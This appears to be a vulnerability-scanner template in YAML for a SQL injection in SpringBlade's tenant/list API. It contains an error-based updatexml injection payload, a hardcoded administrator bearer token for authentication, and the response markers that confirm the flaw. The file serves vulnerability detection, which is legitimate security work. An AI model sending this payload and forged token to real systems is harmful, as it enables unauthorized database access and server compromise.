Poc_Scanner/poc/Frame-Poc/SpringBlade-list-SQL.yaml
2024-10-09 15:15:50 +08:00

33 lines
1.8 KiB
YAML
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

keyword: SpringBlade
name: SpringBlade_SQL注入漏洞
description: |
SpringBlade系统menu接口存在SQL注入漏洞
requests: # 为空代表默认或者不启用
path: "/api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1"
method: GET
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Length:
Accept:
Content-Type:
Accept-Encoding:
Cookie:
Referer:
X-Forwarded-For:
Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ
body-raw: |-
response:
path: "" # 不填则默认接收此请求的响应包
status-code: 500
body: "database" # 此处可填写响应体中确认漏洞存在的关键字或者其他信息
time: # 此处填写响应包响应时间,默认不启用
headers:
Server:
Content-type:
Content-length:
Date:
Connection:
impact: |
SpringBlade 后台框架 /api/blade-system/tenantist路径存在SQL注入漏洞攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。